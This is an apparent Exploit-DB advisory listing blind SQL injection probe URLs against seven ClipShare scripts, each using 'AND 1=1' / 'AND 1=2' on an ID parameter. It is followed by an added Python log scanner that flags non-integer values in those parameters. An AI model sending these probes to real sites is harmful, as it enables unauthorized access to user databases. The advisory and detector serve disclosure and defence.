Exploit ClipShare 4.1.1 - Multiples Vulnerabilities

Posted by: Exploiter, 18 Dec 2022
EDB-ID: 24894
EDB verification: Passed
Author: ESAC
Vulnerability type: WEBAPPS
Platform: PHP
CVE: CVE-2008-5489, CVE-2008-0089
Publication date: 2013-03-27
Code:
# Exploit Title: ClipShare 4.1.1 - Multiples Vulnerabilities
# Exploit Author: Esac
# Vulnerable Software: ClipShare - Video Sharing Community Script 4.1.4
# Official site: http://www.clip-share.com
# Software License: Commercial.
#all versions are vulnerable:
#Last Checked: 27 March 2013

# Note: to exploit this vulnerability, the MAGIC_QUOTES_GPC directive must be turned off on the server side (php.ini).

==============================================================================================

vuln file : gvideos.php , param : gid 

Poc :

http://server/mavideo/gvideos.php?gid=1 [Blind]

# To exploit this PoC, a group must already have been added with some public videos.

Real exploitation :

http://server/mavideo/gvideos.php?gid=1 AND 1=1

==> return normal page

http://server/mavideo/gvideos.php?gid=1 AND 1=2
==> return page with some errors ( or with nothing - white page )


-------------------------------------------------------------------------------------------------------------------------------------------------


vuln file : channel_detail.php , param : chid

Poc :

http://server/mavideo/channel_detail.php?chid=4 [Blind]


Real exploitation :

http://server/mavideo/channel_detail.php?chid=4 AND 1=1
==> return normal page

http://server/mavideo/channel_detail.php?chid=4 AND 1=2
==> return page with some errors ( or with nothing - white page )


-------------------------------------------------------------------------------------------------------------------------------------------------

vuln file : uprofile.php , param : UID

Poc :

http://server/mavideo/uprofile.php?UID=66 [Blind]


Real exploitation :

http://server/mavideo/uprofile.php?UID=66 AND 1=1
==> return normal page

http://server/mavideo/uprofile.php?UID=66 AND 1=2
==> return page with some errors ( or with nothing - white page )


-------------------------------------------------------------------------------------------------------------------------------------------------

vuln file : ufavour.php , param : UID

Poc :

http://server/mavideo/ufavour.php?UID=66 [Blind]


Real exploitation :

http://server/mavideo/ufavour.php?UID=66 AND 1=1
==> return normal page

http://server/mavideo/ufavour.php?UID=66 AND 1=2
==> return page with some errors ( or with nothing - white page )


-------------------------------------------------------------------------------------------------------------------------------------------------
vuln file : ufriends.php , param : UID

Poc :

http://server/mavideo/ufriends.php?UID=66 [Blind]


Real exploitation :

http://server/mavideo/ufriends.php?UID=66 AND 1=1
==> return normal page

http://server/mavideo/ufriends.php?UID=66 AND 1=2
==> return page with some errors ( or with nothing - white page )


-------------------------------------------------------------------------------------------------------------------------------------------------
vuln file : uplaylist.php , param : UID

Poc :

http://server/mavideo/uplaylist.php?UID=66 [Blind]


Real exploitation :

http://server/mavideo/uplaylist.php?UID=66 AND 1=1
==> return normal page

http://server/mavideo/uplaylist.php?UID=66 AND 1=2
==> return page with some errors ( or with nothing - white page )


-------------------------------------------------------------------------------------------------------------------------------------------------
vuln file : ugroups.php , param : UID

Poc :

http://server/mavideo/ugroups.php?UID=66 [Blind]


Real exploitation :

http://server/mavideo/ugroups.php?UID=66 AND 1=1
==> return normal page

http://server/mavideo/ugroups.php?UID=66 AND 1=2
==> return page with some errors ( or with nothing - white page )


-------------------------------------------------------------------------------------------------------------------------------------------------

PwnEd.
Tested version:
Sunday , March 27, 2013 | Version: 4.1.4 | Username: admin | Logout
Copyright © 2006-2008 ClipShare. All rights reserved.
~ Game Over ~
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

Greetz : White Tarbouch Team & Cobra & Dami 

==> Made In Morocco <==
./Esac
 
Source
www.exploit-db.com
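
Defender-side added example, not part of the original advisory or of ClipShare's code: a scan of web access logs for requests to the seven scripts listed above whose ID parameter is not a plain integer, which covers the `AND 1=1` / `AND 1=2` probes and any other non-numeric value. The combined log format, the function names and the sample log lines are assumptions made up for illustration.

```python
import re
from urllib.parse import urlsplit, parse_qsl

# Script -> ID parameter, exactly as listed in the advisory above.
ID_PARAMS = {
    "gvideos.php": "gid",
    "channel_detail.php": "chid",
    "uprofile.php": "UID",
    "ufavour.php": "UID",
    "ufriends.php": "UID",
    "uplaylist.php": "UID",
    "ugroups.php": "UID",
}

# Request line inside a combined-format access log entry (assumed log format).
REQUEST_RE = re.compile(r'"(?:GET|POST|HEAD) (\S+) HTTP/[\d.]+"')

def suspicious_id(line):
    """Return (script, param, value) if a listed ID parameter is not a plain integer."""
    m = REQUEST_RE.search(line)
    if not m:
        return None
    url = urlsplit(m.group(1))
    script = url.path.rsplit("/", 1)[-1]
    param = ID_PARAMS.get(script)
    if param is None:
        return None
    # parse_qsl percent-decodes and maps '+' to a space, so encoded probes are normalised.
    for name, value in parse_qsl(url.query, keep_blank_values=True):
        if name == param and not re.fullmatch(r"[0-9]+", value):
            return (script, param, value)
    return None

def scan(lines):
    """Collect every suspicious hit from an iterable of log lines."""
    return [hit for hit in map(suspicious_id, lines) if hit]

# Constructed sample log lines (documentation IP ranges, not real traffic).
SAMPLE_LOG = [
    '198.51.100.7 - - [27/Mar/2013:10:00:01 +0000] "GET /mavideo/gvideos.php?gid=1 HTTP/1.1" 200 5120',
    '198.51.100.7 - - [27/Mar/2013:10:00:02 +0000] "GET /mavideo/gvideos.php?gid=1%20AND%201=1 HTTP/1.1" 200 5120',
    '198.51.100.7 - - [27/Mar/2013:10:00:03 +0000] "GET /mavideo/gvideos.php?gid=1+AND+1=2 HTTP/1.1" 200 0',
    '203.0.113.9 - - [27/Mar/2013:10:05:00 +0000] "GET /mavideo/uprofile.php?UID=66 HTTP/1.1" 200 4096',
    '203.0.113.9 - - [27/Mar/2013:10:05:09 +0000] "GET /mavideo/index.php?q=1%20AND%201=1 HTTP/1.1" 200 2048',
]

if __name__ == "__main__":
    for script, param, value in scan(SAMPLE_LOG):
        print(f"non-integer {param} in {script}: {value!r}")
```

The same integer-only rule is the fix on the application side: these parameters are numeric IDs, so any value that fails the check can be rejected before it reaches a query.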
